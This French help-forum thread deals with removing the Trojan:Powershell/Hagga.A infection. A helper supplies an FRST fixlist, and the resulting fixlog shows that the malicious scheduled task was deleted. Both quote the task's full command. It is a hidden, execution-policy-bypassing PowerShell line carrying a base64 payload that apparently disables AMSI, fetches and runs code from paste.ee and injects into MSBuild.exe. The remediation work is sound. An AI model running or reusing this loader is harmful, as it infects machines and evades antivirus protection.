Trojan:Powershell/Hagga.A - aide pour désinfection [résolu]

[Gg45]

Bonjour à tous,

Windows Defender détecte et émet des alertes sur trojan:Powershell/Hagga.A.
J'ai tenté de désinfecter mon PC avec ces outils mais le problème persiste :
- AdwCleaner
- ZHPCleaner
- Malwarebytes Anti-Malware (MBAM)
- WINDOWS DEFENDER (analyse complète)
- NOD32 (analyse complète)

D'ailleurs toute les 30 secondes une fenêtre CMD s'ouvre et se ferme rapidement. Windows Defender le voit, le supprime, et il revient aussitôt !

Merci d'avance pour votre aide !

ADDITION : https://pjjoint.malekal.com/files.php?i ... x14u14x8t7
FRST : https://pjjoint.malekal.com/files.php?i ... 7c7z12y5y9

[Malekal_morte]

Bonjour,

AdwCleaner et ZHPCleaner ne visent pas les menaces de type Trojan.
Ils sont à utiliser si tu as des pubs intempestives, sinon aucun intérêt.
Supprime les.

~~


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
Task: {C5F16F82-A494-4849-98CB-43DC37692484} - System32\Tasks\btSVMiqSJ => cmd.exe /c powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) {  Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJABUAHUAaABVAGwAUgAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABFAGMAUwBZAE8ARQBDAEIAcgByAHkAZABLAE0AdgBRAFAAZABUAHMARwBxAFgAcABZAGwAWgBXAGkATwB4AFcAWABQAHAASAB1AFgAeQB1AEsAcQBqAEQAVQBiAEEAawBNAFIAdQBzAGoAcwBiAFcAVwBJAE0AbgBPAHgARABjAE8AVAB2AHcARABQAHoARgBrAG4AVQBHAEgAcgBFAGkAYQBPAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAFQAdQBoAFUAbABSACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASgBqAHAAUQBIACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQARQBjAFMAWQBPAEUAQwBCAHIAcgB5AGQASwBNAHYAUQBQAGQAVABzAEcAcQBYAHAAWQBsAFoAVwBpAE8AeABXAFgAUABwAEgAdQBYAHkAdQBLAHEAagBEAFUAYgBBAGsATQBSAHUAcwBqAHMAYgBXAFcASQBNAG4ATwB4AEQAYwBPAFQAdgB3AEQAUAB6AEYAawBuAFUARwBIAHIARQBpAGEATwA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAVAB1AGgAVQBsAFIALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwAxAFUASABDADIAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAEUAYwBTAFkATwBFAEMAQgByAHIAeQBkAEsATQB2AFEAUABkAFQAcwBHAHEAWABwAFkAbABaAFcAaQBPAHgAVwBYAFAAcABIAHUAWAB5AHUASwBxAGoARABVAGIAQQBrAE0AUgB1AHMAagBzAGIAVwBXAEkATQBuAE8AeABEAGMATwBUAHYAdwBEAFAAegBGAGsAbgBVAEcASAByAEUAaQBhAE8AKQA7AA==; }else{ exit;} <==== ATTENTION
Hosts:
Reboot:
End:

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)

~~

Refais un scan FRST et donne à nouveau les rapports.
Assure toi de bien donner Addition.txt car tu as donné deux fois FRST.txt

[Gg45]

Merci pour ton aide rapide.

J'ai utilisé ADWCLEANER et ZHPCLEANER car il était sévèrement atteint, le seul problème qui persistait c'est ce TROJAN.

Voici le rapport FIXLOG :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 07-07-2021
Exécuté par Christian Roquelle (08-07-2021 12:27:18) Run:1
Exécuté depuis D:\Downloads
Profils chargés: Christian Roquelle
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Start:
CloseProcesses:
CreateRestorePoint:
Task: {C5F16F82-A494-4849-98CB-43DC37692484} - System32\Tasks\btSVMiqSJ => cmd.exe /c powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJABUAHUAaABVAGwAUgAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABFAGMAUwBZAE8ARQBDAEIAcgByAHkAZABLAE0AdgBRAFAAZABUAHMARwBxAFgAcABZAGwAWgBXAGkATwB4AFcAWABQAHAASAB1AFgAeQB1AEsAcQBqAEQAVQBiAEEAawBNAFIAdQBzAGoAcwBiAFcAVwBJAE0AbgBPAHgARABjAE8AVAB2AHcARABQAHoARgBrAG4AVQBHAEgAcgBFAGkAYQBPAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAFQAdQBoAFUAbABSACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASgBqAHAAUQBIACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQARQBjAFMAWQBPAEUAQwBCAHIAcgB5AGQASwBNAHYAUQBQAGQAVABzAEcAcQBYAHAAWQBsAFoAVwBpAE8AeABXAFgAUABwAEgAdQBYAHkAdQBLAHEAagBEAFUAYgBBAGsATQBSAHUAcwBqAHMAYgBXAFcASQBNAG4ATwB4AEQAYwBPAFQAdgB3AEQAUAB6AEYAawBuAFUARwBIAHIARQBpAGEATwA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAVAB1AGgAVQBsAFIALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwAxAFUASABDADIAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAEUAYwBTAFkATwBFAEMAQgByAHIAeQBkAEsATQB2AFEAUABkAFQAcwBHAHEAWABwAFkAbABaAFcAaQBPAHgAVwBYAFAAcABIAHUAWAB5AHUASwBxAGoARABVAGIAQQBrAE0AUgB1AHMAagBzAGIAVwBXAEkATQBuAE8AeABEAGMATwBUAHYAdwBEAFAAegBGAGsAbgBVAEcASAByAEUAaQBhAE8AKQA7AA==; }else{ exit;} <==== ATTENTION
Hosts:
Reboot:
End:
*****************

Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C5F16F82-A494-4849-98CB-43DC37692484}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C5F16F82-A494-4849-98CB-43DC37692484}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\btSVMiqSJ => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\btSVMiqSJ" => supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.


Le système a dû redémarrer.

==== Fin de Fixlog 12:27:29 ====

ADDITION : https://pjjoint.malekal.com/files.php?i ... 7w8p8l11u5
FRST : https://pjjoint.malekal.com/files.php?i ... 12y11j12f5

[Gg45]

Résolu, merci !

[Malekal_morte]

ok,


Tu peux supprimer le dossier C:\FRST =)


Termine par un nettoyage Malwarebytes Anti-Malware (MBAM) version gratuite
Evite les analyses et nettoyages réguliers ZHPCleaner, AdwCleaner, pas utile.

Pour terminer, à lire : que faire après une attaque de virus informatique.
Change tes mots de passe et suis les instructions pour la bonne conduite pour ne plus te faire infecter.